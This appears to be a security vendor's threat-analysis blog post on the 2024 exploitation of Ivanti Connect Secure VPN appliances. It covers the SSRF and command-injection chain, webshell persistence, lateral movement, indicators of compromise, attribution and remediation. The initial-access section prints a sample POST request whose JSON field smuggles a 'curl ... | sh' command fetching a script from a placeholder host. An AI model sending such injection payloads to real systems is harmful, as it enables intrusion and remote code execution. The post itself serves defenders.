Inside the Ivanti Zero-Day Exploitation Campaign
Anatomy of a Hack

In early 2024, multiple advanced persistent threat (APT) groups exploited a series of zero-day vulnerabilities in Ivanti Connect Secure and Policy Secure VPN appliances. The flaws—eventually assigned CVEs CVE-2024-21887 and CVE-2024-21893—enabled unauthenticated attackers to achieve remote code execution (RCE) and unauthorized access to sensitive government, defense, and corporate networks globally.
Silent Breach threat intelligence teams tracked these campaigns in real-time, correlating indicators from intrusion telemetry, reverse engineering captured payloads, and analyzing infrastructure overlap with known PRC-affiliated actors.
Initial Access
The attack began with exploitation of CVE-2024-21893, a server-side request forgery (SSRF) vulnerability in Ivanti Connect Secure. This flaw allowed attackers to access restricted internal resources via crafted HTTP requests. Once the SSRF was successful, attackers chained it with CVE-2024-21887, a command injection flaw in the web component.
Payloads were encoded in legitimate-looking POST requests, leveraging parameters in /api/v1/totp/user-backup-code to inject shell commands via malformed JSON inputs. A sample payload:
POST /api/v1/totp/user-backup-code HTTP/1.1
Host: [target]
Content-Type: application/json
{
"user": "; curl http://malicious[.]host/payload.sh | sh; echo"
}
Establishing Persistence
Once the attacker gained code execution, they deployed custom webshells to the appliance’s non-persistent directories, bypassing standard filesystem protections. One common implant was a modified Perl-based shell that blended into legitimate components like dsserver.cgi.
To maintain access even after reboots or patches, attackers tampered with Ivanti's internal configuration files (/data/runtime/mtx.conf) and enabled reverse SSH tunnels to C2 infrastructure. In some variants, modified cron jobs were used to periodically re-fetch implants from attacker-controlled S3 buckets.
Lateral Movement and Data Exfiltration
After compromising the VPN gateway, attackers conducted credential harvesting by hooking into active sessions. They exfiltrated session cookies, AD tokens, and configuration files containing encrypted secrets.
In several observed intrusions, attackers pivoted into downstream environments using harvested credentials. RDP, SMB, and PowerShell Remoting were used to move laterally. Where EDR was detected, attackers utilized in-memory tools like Cobalt Strike and Sliver to evade disk-based detection.
TTPs and Infrastructure Analysis
Initial Access: SSRF + Command Injection
C2 Protocols: HTTPS over non-standard ports, reverse SSH, DNS tunneling (via iodine)
Payload Hosting: Alibaba Cloud, DigitalOcean droplets, S3 buckets with public read access
Persistence: Webshells in /data/runtime/, cron jobs, tampered config reload scripts
Evasion: Timestomping, WMI-based reconnaissance, API throttling to evade logging
Indicators of Compromise (IoCs)
Webshell hash: e5f89f2c1c8f65c29a6e5d541e81ad3e
C2 domain: secureupdate-vpn[.]com
Malicious IPs: 45.88.12.44, 142.132.222.12
Modified files: /data/runtime/mtx.conf, /data/runtime/tmp/sshd_config
Attribution
Attribution for this campaign is ongoing, but strong indicators point to multiple Chinese nation-state groups, likely operating under the Ministry of State Security (MSS) umbrella. Silent Breach analysts identified operational overlaps with known tactics used by APT5 and UNC4841, including:
Shared infrastructure with prior Fortinet and Pulse Secure VPN campaigns.
Payload encryption routines and loader structures matching known MSS malware families.
C2 domain registration patterns (name servers, certificate issuers) linked to past PRC cyber campaigns.
While some of the infrastructure appeared to be leased via third-party providers, forensics revealed consistent operational discipline, encrypted telemetry, and use of Chinese-language debugging strings. These findings align with past campaigns targeting zero-day vulnerabilities in perimeter devices.
The attack’s timing, sophistication, and targeting also suggest strategic intelligence collection rather than immediate monetization, further strengthening the case for a state-sponsored actor.
Impact Assessment and Remediation
Victims spanned across North America, Europe, and APAC, including defense contractors, energy firms, and major universities. The compromise allowed attackers to bypass MFA, intercept sensitive data in transit, and establish long-term persistence inside segmented environments. Detection was difficult due to the nature of VPN infrastructure operating as a trusted conduit for enterprise traffic.
Security teams should immediately:
Inspect /data/runtime/ for unauthorized modifications
Rotate all credentials stored or transmitted via the VPN
Audit access logs for unusual POST requests to TOTP or configuration APIs
Deploy endpoint monitoring for lateral movement from Ivanti appliances
Ivanti released patches in February 2024. Silent Breach recommends redeploying affected appliances from clean images, not simply applying patches, due to potential backdoor implants.
How Silent Breach Can Help
Silent Breach provides advanced threat simulations that emulate nation-state exploitation of zero-day vulnerabilities. Our team offers forensic audits of VPN infrastructure, custom YARA rules for webshell detection, and red team exercises targeting perimeter access vectors.
To assess your exposure to the Ivanti intrusion or similar threat campaigns, contact Silent Breach for a tailored compromise assessment and defense validation.
About Silent Breach: Silent Breach is an award-winning provider of cyber security services. Our global team provides cutting-edge insights and expertise across the Data Center, Enterprise, SME, Retail, Government, Finance, Education, Automotive, Hospitality, Healthcare and IoT industries.
Silent Breach in the press
Silent Breach Breaches Department of Defense (DoD) Network
Similar Reads
CVE-2025-22222: Credential Exposure in VMware Aria
similar read